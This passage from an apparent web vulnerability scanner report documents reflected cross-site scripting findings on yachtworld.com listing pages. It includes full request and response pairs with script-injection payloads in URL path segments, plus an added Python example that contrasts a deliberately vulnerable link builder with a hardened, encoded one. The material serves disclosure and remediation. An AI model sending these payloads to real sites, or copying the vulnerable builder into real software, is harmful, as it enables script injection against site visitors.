Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:03 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&848cf"><script>alert(1)</script>c7c6ac147ce=1&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States&boat_id=1930392">
...[SNIP]...

3.93. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 4 (the city segment, Gloucester) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 234c4"><script>alert(1)</script>97cd139ab78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response, inside the back= parameter of the photoGallery.jsp link's href attribute, the same sink as in 3.91: the whole request path is copied into the link, so every path segment is an injection point.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)</script>97cd139ab78/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:50 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)</script>97cd139ab78/VA/United-States&boat_id=2305173">
...[SNIP]...
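
The three findings above (3.91, 3.92 and 3.93) share one sink: the request path and the incoming query string are concatenated into the href of the photoGallery.jsp link, and the payload's double quote ends the attribute. The following is an added example, not part of this report and not yachtworld.com's code, written in Python for clarity rather than in the site's JSP. The two link-builder functions are an assumption reconstructed from the reflected output (the vulnerable one reproduces the report's response fragments byte for byte); the allow-list of pass-through parameter names is also assumed. The check at the end parses the markup the way a browser would and reports whether a <script> element escaped the attribute.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Evidence copied from findings 3.92 and 3.93 above: the submitted parameter name / path
# and the exact fragments the application echoed back.
PARAM_NAME_3_92 = '848cf"><script>alert(1)</script>c7c6ac147ce'
REFLECTED_3_92 = (
    '<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&'
    + PARAM_NAME_3_92
    + '=1&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392'
    + '&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States'
    + '&boat_id=1930392">'
)
REQUEST_PATH_3_93 = ('/boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)'
                     '</script>97cd139ab78/VA/United-States')
REFLECTED_3_93 = (
    '<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet'
    + '&seo=0&checked_boats=2305173&boat_id=2305173&back=/core'
    + REQUEST_PATH_3_93
    + '&boat_id=2305173">'
)


def build_gallery_link_vulnerable(request_path, boat_id, extra_params=None):
    """Assumed reconstruction of the sink: raw path and raw query parameters are
    concatenated into the href with no URL encoding and no HTML attribute encoding."""
    extra = "".join("%s=%s&" % (k, v) for k, v in (extra_params or {}).items())
    href = ("/core/listing/photoGallery.jsp?slim=quick&currency=USD&" + extra
            + "units=Feet&seo=0&checked_boats=%s&boat_id=%s&back=/core%s&boat_id=%s"
            % (boat_id, boat_id, request_path, boat_id))
    return '<a rel="nofollow" href="%s">' % href


def build_gallery_link_hardened(request_path, boat_id, extra_params=None):
    """Hardened builder (assumed design, not the site's fix): only known parameter names
    may be overridden, every value (including 'back') is percent-encoded by urlencode,
    and the finished URL is HTML-attribute-encoded before it is placed in the markup."""
    params = {"slim": "quick", "currency": "USD", "units": "Feet"}
    for name, value in (extra_params or {}).items():
        if name in params:          # anything outside the allow-list is dropped
            params[name] = value
    params.update(seo="0", checked_boats=boat_id, boat_id=boat_id,
                  back="/core" + request_path)
    href = "/core/listing/photoGallery.jsp?" + urlencode(params)
    return '<a rel="nofollow" href="%s">' % html.escape(href, quote=True)


class _LinkInspector(HTMLParser):
    """Records start tags and href values as an HTML parser sees the fragment."""

    def __init__(self):
        super().__init__()
        self.tags, self.hrefs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs.extend(v for k, v in attrs if k == "href")


def inspect(markup):
    """Return (start tags in order, href attribute values) for a markup fragment."""
    parser = _LinkInspector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.hrefs


def script_escapes_attribute(markup):
    """True when the payload's quote closed the href and a real <script> element follows."""
    return "script" in inspect(markup)[0]


if __name__ == "__main__":
    vuln = build_gallery_link_vulnerable(REQUEST_PATH_3_93, "2305173")
    hard = build_gallery_link_hardened(REQUEST_PATH_3_93, "2305173", {PARAM_NAME_3_92: "1"})
    print("vulnerable output matches report:", vuln == REFLECTED_3_93)
    print("vulnerable: script escapes attribute:", script_escapes_attribute(vuln))
    print("hardened:   script escapes attribute:", script_escapes_attribute(hard))
    print("hardened href as parsed:", inspect(hard)[1][0])
```

The inspector shows what the scanner's "Certain" confidence rests on: in the vulnerable output the parsed href ends at Gloucester234c4 and a script start tag follows it, while in the hardened output the parser sees a single a element whose href contains %22%3E%3Cscript%3E and no quote or angle bracket at all. Note that the fix has two independent layers, percent-encoding of the URL components and attribute encoding of the finished URL; dropping either one reopens the sink for some input.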

3.94. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 5 (the state segment, VA) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a142d"><script>alert(1)</script>12c59d7a8be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VAa142d"><script>alert(1)</script>12c59d7a8be/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:28 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:28 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%